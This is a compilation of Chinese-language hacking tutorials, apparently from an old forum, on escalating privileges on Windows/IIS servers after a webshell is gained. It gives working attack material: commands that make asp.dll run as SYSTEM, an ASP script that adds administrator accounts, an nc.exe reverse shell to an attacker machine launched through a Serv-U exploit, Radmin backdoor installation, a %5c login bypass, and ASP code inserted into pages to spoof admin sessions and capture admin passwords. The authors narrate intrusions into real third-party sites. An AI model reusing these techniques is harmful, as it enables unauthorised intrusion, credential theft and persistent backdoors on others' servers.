不能与 /A 命令行开关搭配使用
这个命令没有试验过,看能不能替换不能访问的文件夹下的文件,大家可以试验下
五
脚本
编写一个启动/关机脚本配置文件scripts.ini,这个文件名是固定的,不能改变。内容如下:
[Startup]
0CmdLine=a.bat
0Parameters=
将文件scripts.ini保存到"C:\winnt\system32\GroupPolicy\Machine\Scripts"
A.BAT的内容可以是NET USER yonghu mima
也可以是NET USER ADMINistrator XXX
这样可以恢复你想要得任意用户名的密码,也可以自己增加新的用户,但是要依赖重启,还有就是对SYSTEM32有写的权限
六
SAM
如果可以访问对方的SYSTEM32的话,删除对方的SAM文件,等他重启以后就是ADMIN用户密码为空
突然又有了想法,可以用REPLACE命令替换的吗,可以把你的SAM文件提取出来,上传到他的任意目录下,然后替换。不过不知道如果对SYSTEM32没有权限访问的话,能不能实现替换
--------------------------------------------------------------------------------
--
--
使用FlashFXP来提升权限 最近各位一定得到不少肉鸡吧:),从前段时间的动网的upfile漏洞, 动力文章系统最新漏洞到first see发现的动网sql版本的一个超级大漏洞。有人一定忙的不易乐乎,大家的方法也不过是使用一下asp脚本的后门罢了。至于提 升权限的问题呵呵,很少有人能作一口气完成。关键还是在提升权限上做个问题上,不少服务器设置的很BT,你的asp木马可能都用不了,还那里来的提升啊。我们得到webshell也就是个低级别的用户的权限,各种提升权限方法是可谓五花八门啊,如何提升就看你自己的妙 招了。
其一,如果服务器上有装了pcanywhere服务端,管理员为了便于管理也给了我们方便,到系统盘的Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/中下载*.cif本地破解就使用pcanywhere连接就ok了。
其二,如果对方有Serv-U大家不要骂我啊,通过修改ServUDaemon.ini和fpipe这软件提升权限应该是不成问 题吧。
其三,通过替换系统服务来提升。
其四,查找conn和config这类型的文件看能否得到sa或者mysql的相关密码,可能会有所收获等等。
本人在一次无聊的入侵过程中发现了这个方法,使用Flashfxp也能提升权限,但是成功率高不高就看你自己的运气了:)
本人www.xxx.com 通过bbs得到了一个webshell,放了个小马(现在海阳的名气太大了偶不敢放),而且已经将一段代码插入了N个文件中,够黑吧。提升权限没时间做。在我放假回家后,一看我晕bbs升级到动网sp2了我放的小马也被K了,人家的BBS是access版本的。郁闷啊!突然想起我将一个页面插入了asp的后门,看看还有没有希望了。输www.xxx.com/xx.asp?id =1 好家伙,还在!高兴ing
图1
于是上传了一个asp的脚本的后门,怎么提升权限呢?
在这个网站的主机上游荡了N分钟,在C:\ Program Files下发现了FlashFXP文件夹(跟我一样使用这个软件自己心里暗想)图2,于是就打了了Sites. dat这个文件(编辑)这是什么东西密码和用户名,而且密码是加了密的。
如果我把这些文件copy回本地也就是我的计算机中,替换我本地的相应文件会怎么样呢?
于是我就将Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak几个文件下载到我的计算机中替换了我电脑中flashfxp文件夹的相应文件。打开flashfxp 在站点中打开站点管理器一项。乖 乖发财了
对方管理员通过flashfxp连接的各个站点都在图3,点击连接。通过了于是我们又有了一堆肉鸡,我们有ftp权限。上传脚本 木马~ 呵呵。
说了半天这提升权限的事情一点没讲啊
不要急,大家看看对方管理员的这站点管理器,有用户名和密码,密码是星号的。可惜啊!
又想起了在Sites.dat中也显示了密码和用户名,而且密码是加密的。
现在的星号密码会不会也是加了密的?看看就行了呗。
怎么看? 菜鸟了吧 手头有个不错的查看星号的软件,就是xp星号密码查看器,通过查看跟Sites.dat中加密了密码做比较。看图4和图5 的比较 很显然在站点管理器中查看到的密码是明文显示的。发财了吧
下一步就是使用xp星号密码查看器这个软件来提取密码和用户名。看者这些复杂的密码,还真有点怀念当年玩sniff的时光。呵呵
密码为:b69ujkq6 hyndai790 s584p*fv4-c+ 98cq3jk4 3-8*ef./2z5+
用户名:bn7865t nilei75 qm/-g57+3kn qm/-g57+3kn 5.e*82/+69
(上述部分密码和用户名已经作了必要的修改)
这么多的信息,按社会工程学的概念来说,没有管理员的密码。打死我也不相信。最终我得到了这个网站管理员的密码从这堆东西中找到 的。
我想这个问题应该反馈到flashfxp官方,让他们在下个版本中修正这个漏洞或者说是错误。经过后来测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地还原对方管理员的各个站点的密码。希望大家在入侵的时候遇到fla shfxp的时候能想到这个方法,至少也可以得到一堆新的肉鸡。不防试试?希望能给大家渗透带来帮助。
--------------------------------------------------------------------------------
--
--
将asp权限提到最高by: cnqing from:http://friend.91eb.com
本来是要写个提权asp木马的,可惜时间不是太多功底也不是太深。先把原理方法告诉大家好了。简单说说,说的太麻烦没有必要。懂了就行。
原理:
asp文件的教本解释是由asp.dll运行的。由dllhost.exe启动的。身分是IWAN_NAME。若是把asp.dll放到inprocesslsapiapps中那它就是由inetifo.exe直接启动。身份是system
方法:
第一步。
得到inprocesslsapiapps内容,用命令"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"。将得到的一组dll复制下来。
第二步
写一个bat内容为"cscript C:\Inetpub\AdminScripts\adsutil vbs set w3svc/inprpocessisapiapps "C:\Inetpub\AdminScripts\asp.dll" ·····
省略号为复制下的内容。中间用空格分开不要带回车符
最后运行这个bat就行了。
例如:
我用"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"得到
"c:\winnt\system32\inetsrv\httpext.dll"
"c:\winnt\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\System32\msw3prt.dll"
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_aut\author.dll"
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_adm\admin.dll"
"C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\shtml.dll"
那么你的bat就应该是:
cscript C:\Inetpub\AdminScripts\adsutil vbs set w3svc/inprpocessisapiapps "C:\Inetpub\AdminScripts\asp.dll" "c:\winnt\system32\inetsrv\httpext.dll" "c:\winnt\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\System32\msw3prt.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_aut\author.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\_vti_adm\admin.dll" "C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\isapi\shtml.dll"
已测试成功!!
--------------------------------------------------------------------------------
--
--
利用%5c绕过验证
利用%5c绕过验证
---------------------------------------
lake2(http://mrhupo.126.com)
2004-11-27
---------------------------------------
说到%5c,你是不是想起了当前流行的那个%5c暴库漏洞,呵呵,本文就是对%5c利用的探索(呵呵,当然有我提出的新东东,或许对你有帮助哦^_^)。
好,我们先追根溯源,找到那个漏洞的老底。看看绿盟2001年的漏洞公告:http://www.nsfocus.net/index.php?ac...iew&bug_id=1429
N 年以前利用这个漏洞可以实现目录遍历,虽然微软出了补丁,不过好像补丁是用来限制iis只能访问虚拟目录的,所以漏洞还是存在,只不过利用方式变了。对 iis来说,提交一个含有%5c的url能够找到文件,但是该文件里以相对路径引用的其他文件却找不到了(%5c是\的url编码,iis跳转到上一级目录去找,当然找不到;头晕了吧,哈哈,我也头晕啊)。
后来这个漏洞就被牛人挖掘出来了,也就是传说中的%5c暴库:由于连接数据库的文件引用的相对路径,提交%5c找不到文件,所以导致出错,iis就会老老实实的说出数据库的路径(不明白?找google)。
一个偶然的机会我发现还可以利用%5c绕过asp的验证;当我们暴库失败的时候不妨试试。
废话少说,看下面的代码:
<%
guest_user=trim(request("guest_user"))
guest_password=trim(request("guest_password"))
Set rs= Server.createObject("ADODB.Recordset")
sql="select * from admin where id=1"
rs.open sql,conn,3,2
readuser=rs("guest_user")
readpassword=rs("guest_password")
if readuser<>guest_user or readpassword<>guest_password then
response.write "请输入正确地管理员密码!"
response.end
else
session("admin")=1 '登陆后写入seesion中保存
response.write("登陆成功,请返回信息页")
end if
%>
看到没有,要想通过验证必须让数据库里的用户名密码与提交的一致;想到什么?让我们再看看数据库连接文件代码:
<%
on error resume next
set conn=server.createobject("adodb.connection")
DBPath = Server.MapPath("guestbook.asp")
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
%>
啊,有容错语句不能暴库!等等,如果提交%5c数据库找不到,由于容错,所以程序会继续执行,那么说来从数据库得到的用户名密码皆为空(想想有时暴库失败是不是看到空空的框架,因为数据都是空嘛),哈哈,这样我们就绕过验证了!
知道怎么做了吧,把登陆页面保存到本地,修改提交的url,把最后一个/改成%5c,用户名密码用空格(有的程序会检查用户名密码是否为空,空格会被程序过滤),提交,就ok了。
诶,各位不要以为我自己没事写段代码来捣鼓,实际上这个是我们学校一个高手做的留言板程序,就挂在学校的主页,呵呵。
既然弄懂了原理,当然要找实际漏洞啦,自然是拿大名鼎鼎的"洞"网论坛开刀。不过失败了,因为它的数据库连接文件里有这么一段:
If Err Then
err.Clear
Set Conn = Nothing
Response.Write "数据库连接出错,请检查连接字串。"
Response.End
End If
数据库找不到程序就结束了,呵呵,空欢喜一场。
接着又去down了bbsxp论坛,打开数据库连接文件,晕,根本没有容错语句;呵呵,不过可以暴库哦。
我又不是BT,所以不去找事了,写篇文章,算是给各位高手提供资料吧。
总结一下这个攻击方法成功的条件:1、数据库连接用的相对路径且仅有简单的容错语句;2、服务器iis版本为4或5;3、程序里不检查空字符或者检查时不过滤空格而比较时过滤空格;4、程序不能在一级目录
至于防范,呵呵,既然攻击条件知道了,防范措施自然也出来了^_^
--------------------------------------------------------------------------------
--
--
添加超级用户的.asp代码[蓝屏的原创,凯文改进,Ms未公布的漏洞]
作者:蓝屏,凯文 文章来源:冰点极限
其实上个礼拜我和凯文就在我的肉鸡上测试了,还有河马史诗.结果是在user权限下成功添加Administrators组的用户了(虽然我不敢相信我的眼睛).
上次凯文不发话,我不敢发布啊....现在在他的blog 上看到他发布了,就转来了咯(比我上次测试时还改进了一点,加了个表单).这下大家有福咯```
反正代码是对的,但是很少能成功,具体的看运气了。。呵呵,下一步我想把他整合到海洋里面去。嘿嘿。
.network对象脚本权限提升漏洞利用工具
<%@codepage=936
on error resume next
if request.servervariables("REMOTE_ADDR")<>"127.0.0.1" then
response.write "iP !s n0T RiGHt"
else
if request("username")<>"" then
username=request("username")
passwd=request("passwd")
Response.Expires=0
Session.TimeOut=50
Server.ScriptTimeout=3000
set lp=Server.createObject("WSCRIPT.NETWORK")
oz="WinNT://"&lp.ComputerName
Set ob=GetObject(oz)
Set oe=GetObject(oz&"/Administrators,group")
Set od=ob.create("user",username)
od.SetPassword passwd
od.SetInfo
oe.Add oz&"/"&username
if err then
response.write "哎~~今天你还是别买6+1了……省下2元钱买瓶可乐也好……"
else
if instr(server.createobject("Wscript.shell").exec("cmd.exe /c net user "&username.stdout.readall),"上次登录")>0 then
response.write "虽然没有错误,但是好象也没建立成功.你一定很郁闷吧"
else
Response.write "OMG!"&username&"帐号居然成了!这可是未知漏洞啊.5,000,000RMB是你的了"
end if
end if
else
response.write "请输入输入用户名"
end if
end if
%>
如何绕过防火墙提升权限
本文讲的重点是webshell权限的提升和绕过防火墙,高手勿笑。
废话少说,咱们进入正题。
首先确定一下目标:http://www.sun***.com ,常见的虚拟主机。利用Upfile的漏洞相信大家获得webshell不难。我们这次获得这个webshell,不是DVBBS,而是自由动力3.6的软件上传过滤不严。网站http://www.sun***.com/lemon/Index.asp是自由动力3.6文章系统。Xr运用 WinHex.exe和WSockExpert.exe上传一个网页木马newmm.asp,用过动鲨的door.exe的人都知道,这个是上传asp木马内容的。于是,上传海洋2005a,成功获得webshell。
测试一下权限,在cmd里运行set,获得主机一些信息,系统盘是D盘,也说明了我们的webshell有运行权限的。那我们看看C盘有什么呢?难道是双系统?浏览后发现没有什么系统文件,只有一些垃圾文件,晕死。没关系,再来检查一下,虚拟主机都有serv-u的,这台也不例外,是5.0.0.8的。呵呵,是有本地溢出的呀,挖哈哈。
思路:上传serv-u本地溢出文件srv.exe和nc.exe利用nc来反连接获得系统shell。大家是不是发现海洋2005a那个上传的组件不好用(反正我总遇到这个问题),没关系,用rain改的一个无组件上传,一共有3个文件,up.htm, upload.asp和uploadclass.asp。upload.asp和uploadclass.asp上传到同一个文件夹,up.htm是本地用的,修改up.htm里的链接地址为:http://www.sun***.com/lemon/upload.asp就可以上传了。
传上了srv.exe和nc.exe在H:\long\sun***\lemon(网站目录)后,发现没有运行权限。没关系,根据经验,一般系统下D: \Documents and Settings\All Users\是应该有运行权限的。于是想把文件copy过去,但是发现我们的webshell没有对D盘写的权限,晕死。
可以浏览D:\program files\serv-u\ServUDaemon.ini,不能改,难道要破解serv-u的密码,晕,不想。
不可以这么就泄气了,我突然想到为什么系统不放在C盘了,难道C盘是FAT32分区的?(后来证明了我们的想法。这里说一下,如果主机有win98的系统盘,那里99%是FAT32分区的。我们还遇到过装有Ghost的主机,为了方便在DOS下备份,它的备份盘一般都是FAT分区的。)如果系统盘是 FAT32分区,则网站就没有什么安全性可言了。虽然C盘不是系统盘,但是我们有执行权限。呵呵,copy srv.exe和nc.exe到c:\,运行 srv.exe "nc.exe–e cmd.exe 202.*.*.* 888",这里的202.*.*.*是我们的肉鸡,在这之前我们已经在肉鸡上运行了nc –l –p 888。我们在学校内网里,没有公网ip,不爽-ing。
我们成功获得一个系统shell连上肉鸡。(看起来简单,其实这里我们也遇到过挫折,我们发现有些版本的nc居然没有-e这个参数,还以为全世界nc功能都一样。后来又发现不同版本的nc互连不成功,会出现乱码,没办法用。为此,上传 n次,错误n次,傻了n次,后来终于成功了。做黑客还真得有耐心和恒心。)
高兴之余,我们仍不满足,因为这个shell实在是太慢了。于是,想用我们最常用的Radmin,其实管理员一按Alt+Ctrl+Del,看进程就能发现r_server了,但是还是喜欢用它,是因为不会被查杀。好了,上传admdll.dll,raddrv.dll,r_server.exe到H:\long\sun***\lemon,再用刚才nc得到的 shell把它们copy到d:\winnt\system32\下,分别运行:r_server /install , net start r_server , r_server /pass:rain /save 。
一阵漫长的等待,终于显示成功了。兴冲冲用radmin连上去,发现连接失败。晕死,忘了有防火墙了。上传pslist和pskill上去,发现有backice,木马克星等。Kill掉他们虽然可以登陆,但服务器重启后还是不行,终不是长久之计呀。防火墙是不防21,80等端口的,于是,我们的思路又回到了serv-u上了。把他的 ServUDaemon.ini下载下来,覆盖本机的ServUDaemon.ini,在本机的serv-u上添加一个用户名为xr,密码为rain的系统帐号,加上所有权限。再用老办法,上传,用shell写入D:\program files\serv-u\里,覆盖掉原来的ServUDaemon.ini。虽然又等了n长时间,但是成功了,于是用flashfxp连上,发生 530错误。郁闷,怎么又失败了。(根据经验这样应该就可以了,但为什么不行没有想通,请高手指点。)
不管了,我们重启serv-u就ok 了,怎么重启呢,开始想用shutdown重启系统,但那样我们就失去了nc这个shell,还可能被发现。后来,眼睛一亮,我们不是有pskill吗?刚才用pslist发现有这个进程:ServUDaemon 。把它kill了。然后再运行D:\program files\serv-u\ ServUAdmin.exe ,这里要注意不是ServUDaemon.exe 。
好了,到这里,我们直接ftp上去吧,ls一下,哈哈,系统盘在我的掌握下。我们能不能运行系统命令呢?是可以的,这样就可以:
ftp>quote site exec net user xr rain /add
在webshell上运行net user,就可以看见添加成功了。
整个入侵渗透到这就结束了,在一阵后清理打扫后。我们就开始讨论了。其实,突破防火墙有很多好的rootkit可以做到的,但是我们觉得系统自带的服务才是最安全的后门。
--------------------------------------------------------------------------------
--
--
asp.dll解析成system提升权限
网络上传统的提升asp权限为系统的有两种:
1.图形化下的,把默认站点---->主目录--->应用程序保护设置为低,这样就可以把asp权限设置为system.
但这种提升方法很容易被发现,所以网络有另一种一般是用adsutil.vbs来提升权限.而这个也是今天
我要谈的关于adsutil.vbs提升权限.
2.用adsutil.vbs搞定.
在网络上我看到了很多的教你用这种方法的动画,文章,但我至今没有看到一篇介绍原理的,下面我谈谈我个人的看法:
先举个例子:
有一群狗,这群狗里有几个长老级狗物,它们拥有着至高无上的权限,而其它的狗,他们的权限则少得可怜.
转到计算机上:
在IIS中,有几个Dll文件是拥有特权限的,我们可以理解为系统权限,就像长老级的狗.而解析asp的asp.dll则就像一只
普通的狗,他的权限少得可怜.
那么,如果asp.dll也成了长老级的狗的话,那么asp不也就有了系统权限了吗,这是可以成立的.所以我们的思路也就是
把asp.dll加入特权的dll一族之中.提升步骤为:
<1>先查看有特权一话有哪些.
<2>加asp.dll加入特权一族
好了,下面我们就来实践这个过程.
1)查看有特权的dll文件:
命令为:cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
得到显示为:
C:\Inetpub\AdminScripts>cscript adsutil.vbs get /W3SVC/InProcessIsapiApps
Microsoft (R) Windows 脚本宿主版本 5.1 for Windows
版权所有(C) Microsoft Corporation 1996-1999. All rights reserved.
InProcessIsapiApps : (LIST) (5 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
看到没有,他说明的是有特权限一族为:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
这几个文件,不同的机子,可能会不同.
2)把asp.dll加入特权一族:
因为asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定相同)
我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"
好了,现在你可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去
了,注意,用法中的get和set,一个是查看一个是设置.还有就是你运行上面的你要到C:\Inetpub\AdminScripts>这个目录下.
那么如果你是一个管理员,你的机子被人用这招把asp提升为system权限,那么,这时,防的方法就是把asp.dll T出特权一族,也就是用set这个命令,覆盖掉刚才的那些东东.
例:cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll"
这样就可以了,当你再用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 这个语句查之时,如果没有看见asp.dll,
说明,asp的权限又恢复到以前的权限.
--------------------------------------------------------------------------------
-- --
winNT/2000提升权限
Windows NT/2000 通用的提升方法
攻击者在获得系统一定的访问权限后通常要把自己的权限提升到管理员组,这样攻击者就控制了该计算机系统。这主要有以下几种方法:1.获得管理员密码,下次就可以用该密码进入系统; 2. 先新建一个用户,然后把这个普通添加到管理员组,或者干脆直接把一个不起眼的用户如guest 添加到管理员组; 3. 安装后门。
本文简要介绍在 Windows NT4和 Windows 2000 里攻击者常用的提升权限的方法。下面是具体方法:
方法1 :下载系统的 %windir%\repair\sam.*(WinNT 4 下是sam._ 而Windows2000下是sam )文件,然后用L0pht 等软件进行破解,只要能拿到,肯花时间,就一定可以破解。
问题:(1 )攻击者不一定可以访问该文件(看攻击者的身份和管理员的设置);(2 )这个文件是上次系统备份时的帐号列表(也可能是第一次系统安装时的),以后更改帐号口令的话,就没用了。
方法2 :使用pwdump(L0pht 自带的,Windows 2000下无效)或者pwdump2 ,取得系统当前的用户列表和口令加密列表,然后用L0pht 破解这个列表。
问题:普通用户不能成功运行pwdump类程序(没有权限),例如:使用unicode漏洞进入系统时是IUSR_computer 身份,该用户一般只属于guests组的,运行pwdump类程序就会失败。
(以上两种是离线的)
方法3 :使用 Enum 等程序进行远程破解,猜口令。enum可以使用指定的字典对远程主机的某个用户进行破解。
问题:(1 )如果系统设置了帐号锁定的话,破解几次失败,该帐号就锁定了,暂时不能再破解;(2 )要远程系统开放 Netbios连接,就是 TCP的139 端口,如果用防火墙过滤了的话 Enum 就无法连接到主机。
(以上方法是通过破解获得密码的,还有直接把当前用户提升权限或者添加用户到管理员组的方法。)
方法4 :GetAdmin(WinNT 4 下)、PipeUpAdmin (Windows 2000下),在本机运行可以把当前用户帐号加入管理员组。而 PipeUpAdmin则比较厉害,普通用户和Guests组用户都可以成功运行。
问题:GetAdmin在 SP4有补丁修复了,不能用于高于 SP4的 WinNT 4系统,当然后来又有GetAdmin的增强版本,不过在 SP6a 下好像都不能成功运行。
注:这一方法利用了 WinNT 4系统的安全漏洞,可以安装补丁解决这一问题。
(此外还有变通的方法。)
方法5 :在WinNT 4 和 Windows 2000 注册表里指定用户Shell 程序(Explorer.exe)
时没有使用绝对路径,而是使用了一个相对路径的文件名(考虑到兼容性问题)。
由于在系统启动时程序的搜索顺序问题使得 %Systemdrive%\Explorer.exe(操作系统安装的跟目录下的Explorer.exe)程序执行,这提供了攻击者一个机会在用户下次登录时执行他自己的程序。
问题:攻击者必须有安装系统逻辑盘跟目录的写权限才行,而一般管理员都设置该目录普通用户禁写。
注:这种方法利用了 WinNT 4/Windows 2000 系统的安全漏洞,可以安装补丁解决这种问题。
方法6 :木马:上传木马,然后运行木马,系统重起动后,木马就是本地登录用户的身份了,然后攻击者连接后就有了本地登录用户的权限。因为一般总是管理员本地登录系统,因此这样很可能就获得了管理员的权限。
问题:(1 )杀毒软件或病毒防火墙可能阻止木马运行,还有可能把木马杀死。
(2 )有的木马不能在Guests组身份下运行,这可能与它添加自动运行的方式有关;如没有权限改写注册表的自动运行位置,不能写入%system%\ system32目录(一般的木马都改变文件名,然后写入系统目录,如果没有写入权限系统目录,就不能成功执行木马)。
解决:不过也有用压缩程序(不是通常说的压缩程序,这种压缩程序把可执行程序压缩后,文件变小了,但是仍然可以正常执行)将木马压缩,从而逃过杀毒软件的特征码检测。我曾使用Aspack成功压缩了一个木马,逃过了金山毒霸正式版的检测。不过也有的木马Aspack压缩不了,如冰河。
方法7 :Gina、GinaStub木马。虽然这个也叫木马,但是它的功能和上边的那种大不相同,因为一般的木马是在对方安装一个server端,一旦运行就可以使用client端连接到server端,并进行操作。而 ginastub 一般只有一个动态连接库文件,需要手工安装和卸载,他的功能也不是使用client端控制server端,它仅仅就是捕获用户的登录密码。
问题:安装较麻烦,成功的可能性低,而且安装不当会造成被安装的系统不能启动。
注:这一方法利用的不是系统的安全漏洞,因此不能通过安装补丁解决这一问题。关于Gina,可以参见我的另一篇文章《WinLogon登录管理和GINA简介》
方法8 :本地溢出。缓冲区溢出是进行攻击的最好办法,因为一般都可以获得系统权限或者管理员权限;不过很多远程溢出攻击不需要事先有执行程序的权限,而本地溢出就恰好适合提升权限。Win NT4 的 IIS4 的 ASP扩展有一个本地溢出漏洞,Windows 2000的静态图像服务也有一个溢出漏洞,利用该漏洞,攻击者可以获得系统权限。当然 Windows NT 和 Windows 2000 还有很多程序有溢出漏洞,这是这些程序不是总在运行,因此被利用的可能性比较小。
问题:(1 )ASP 扩展的溢出漏洞需要攻击者有向网站的脚本目录的写权限,才能把攻击程序放到网站上,然后执行。
(2 )静态图像服务缺省没有安装,只有用户在 Windows 2000 上安装静态图像设备(如数码相机、扫描仪等)时才自动安装。
注:这种方法利用了 WinNT 4/Windows 2000 系统的安全漏洞,可以安装补丁解决这种问题。
Windows 2000专用提升漏洞方法方法1 : Windows 2000 的输入法漏洞,利用这个漏洞任何人可以以LocalSystem 身份执行程序,从而可以用来提升权限,不过该漏洞一般限于物理接触 Windows 2000 计算机的人。当然如果开放了终端服务的话,攻击者也可以远程利用该漏洞。
注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。
方法2 :利用 Windows 2000 的 Network DDE DSDM 服务漏洞普通用户可以LocalSystem 身份执行任意程序,可以借此更改密码、添加用户等。Guests组用户也可以成功利用该漏洞。
问题:这个服务缺省没有启动,需要启动这个服务。
注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。
方法3 :Windows 2000的 TELNET 服务进程建立时,该服务会创建一个命名管道,并用它来执行命令。但是,该管道的名字能被预见。如果 TELNET 发现一个已存在的管道名,它将直接用它。攻击者利用此漏洞,能预先建立一个管道名,当下一次 TELNET 创建服务进程时,便会在本地 SYSTEM 环境中运行攻击者代码。
注:这一方法利用了 Windows 2000 系统的安全漏洞,可以安装补丁解决这一问题。
方法 4 :WINDOWS 2K存在一个利用 Debug Registers提升权限的漏洞。如果攻击者能在 WIN2K中运行程序,利用此漏洞,他至少能取得对 %Windir%\SYSTEM32和注册表HKCR的写权。因为x86 Debug Registers DR0-7 对于所有进程都是全局共享的,因此在一个进程中设置硬件断点,将影响其它进程和服务程序。
注:这一方法利用了 Windows 2000 系统的安全漏洞,不过到目前为止微软仍然没有补丁可以安装,但是漏洞攻击程序已经出现了,因此只能堵住攻击者的入口来阻止利用该漏洞。
-------------------------------------------------------------------------------- --
-- 巧妙配合asp木马取得后台管理权限顶(这个可是经典。。。自己体会我不多说了)
前段时间泛滥成灾的动网论坛上传漏洞以及最近接二连三的各种asp系统暴露的上传漏洞,可能很多朋友手中有了很多webshell的肉鸡,至于选择怎么样这些小鸡的方式也是因人而异,有人继续提升权限,进一步入侵,也有人只是看看,马儿放上去了过了就忘记了,也有一些朋友,当webshell的新鲜劲儿过去了后台的神秘感和诱惑力也就大大增加。其实,对很多功能强大的系统而言,拿到后台也就是拿到了一个好的后门了,呵呵............但是现在比较新的版本的很多asp系统密码都是MD5加密然后配合严格的验证程序来验证的,但是我们就没有办法突破这些限制了吗?no!我今天就是要说怎么突破这些限制让我们直奔后台,有马儿厩是好办事,follow
me............
session欺骗篇
首先简单说一下一般asp系统的身份验证原理。
一般来说,后台管理员在登录页面输入账号密码后,程序会拿着他提交的用户名密码去数据库的管理员表里面找,如果有这个人的账号密码就认为你是管理员,然后给你一个表示你身份的session值。或者程序先把你的用户名密码提取出来,然后到数据库的管理员表里面取出管理员的账号密码来和你提交的相比较,如果相等,就跟上面一样给你个表示你身份的sesion值。然后你进入任何一个管理页面它都要首先验证你的session值,如果是管理员就让你通过,不是的话就引导你回到登录页面或者出现一些奇奇怪怪的警告,这些都跟程序员的个人喜好有关。
知道了原理,我们现在的一个思路就是通过我们的asp木马来修改它的程序然后拿到一个管理员session,这样的话尽管我们没有管理员密码,但是我们一样在后台通行无阻了。我把这种方法称为session欺骗。限于篇幅不能每个系统都能详细说明,本文仅以动力文章系统为例来说明。
动力文章系统3.51,(图一)
图一
其实动力文章系统的所有版本全部通杀,包括动易。大家可以自己实践一下。
我们先来看一下它的验证内容。动力文章3.51的验证页面在Admin_ChkLogin.asp
,其验证内容如下:
............
else
rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")
rs("LastLoginTime")=now()
rs("LoginTimes")=rs("LoginTimes")+1
rs.update
session.Timeout=SessionTimeout
session("AdminName")=rs("username")
rs.close
set rs=nothing
call CloseConn()
Response.Redirect "Admin_Index.asp"
前面省略号是用户名密码不正确的验证,直到else,看一下,如果用户名密码正确就给你两个session值:
session.Timeout=SessionTimeout
session("AdminName")=rs("username")
我们在看一下其他管理页面是怎么验证session的,admin_index.asp一开始就这样:
if session("AdminName") = "" then response.Redirect "Admin_Login.asp"end if
看起来似乎很严密,但是我们看一下,它这里值验证一个AdminName的session,只要我们的session内容是AdminName的话不就可以通过了?好,我们开工,先去弄到它的管理员账号再说,这个不要我教你了吧?到他网站逛一下或者直接一点下载它的数据库来看都可以知道。我们找个页面来改一下,我找一个比较没人而内容较多的页面FriendSite.asp(友情链接页面)来改,呵呵,这样管理员也很难查得出来啊。用asp木马的编辑功能来编辑一下它的内容。在他页面下隐蔽处加上下面几句话:
dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="admin" '这里是假设的,实际操作中可以改成你想要得管理员账号
end if
我简单说一下这句话的意思,就是说从地址栏取得hehe的值,如果hehe=120的话,那么系统就给我们一个值为admin的session。好了,我们输入看一下,图二:
图二
看到有什么异常吗,没有吧?还是正常页面,但是我们接着在地址栏中输入它的后台管理首页看看,是不是进去了?图三:
图三
呵呵,别做坏事哦............
小结一下:我们先找到弄到管理员账号,然后找到它的验证页面,根据它的验证内容来写入我们要的后门。不同的系统有不同的验证方式,比如青创文章系统它不但要验证你的用户名还要验证等级,但是我们总体思路还是一样,就是他验证什么我们就加入什么。
密码窃探篇
可以说上述方法在动网论坛或者其他论坛面前是苍白无力的,因为一般论坛由于交互性较强,所以在验证上考虑了很多。以动网为例,你要登录后台,他先验证你有没有先登录了前台,没有的话就给你返回一个错误页面。你登录前台后系统会给你一个seession来记录你的CacheName和你的ID,然后在你登录后台的时候拿出来比较你前后台身份是否一致,一直就通过,否则kill,面对这样严格的验证,难道我们就没有办法基后台了吗?对,没有了(谁拿鸡蛋扔我?这么浪费。),但是我们可以想新的办法,既然验证这么严格,那么我如果拿着密码光明正大的进去呢?因此,这里一个新的思路就是拿到它的明文密码。什么时候有明文密码呢?对了,就在管理员登录的时候。好,我们就在那里做手脚,把它登录的密码发给我们,然后我们拿和它的密码去登录。呵呵,是不是很像 sniffer啊?在下在前几个月刚和好兄弟潜龙在野利用硬件sniffer配合省网安局的人端掉一个非法电影网站,足足4000G的硬盘,几十台服务器,一个字:爽
好了,我们开始修改它的程序。编辑login.asp,加入以下几句话:
if not isnull(trim(request("username"))) then
if request("username")="admin" then
sql="update [Dv_Vser] set UserEmail=(select userpassword from
[Dv_User]
where username='"& request("username")&"') where
UserName='aweige'"
conn.execute(sql)
end if
end if
这几句话的意思就是说如果admin(假设的,实际操作中改为你要的管理员名字)登录成功就更新数据库,把他的密码放到我资料的E-mail中。当然,你必须先在论坛里注册一个用户名。结果如图四:
图四
还有,如果是动网7.0以下的默认数据库admin表名和7.0以上有点不一样,所以实际操作中不可生搬硬套。
后记:
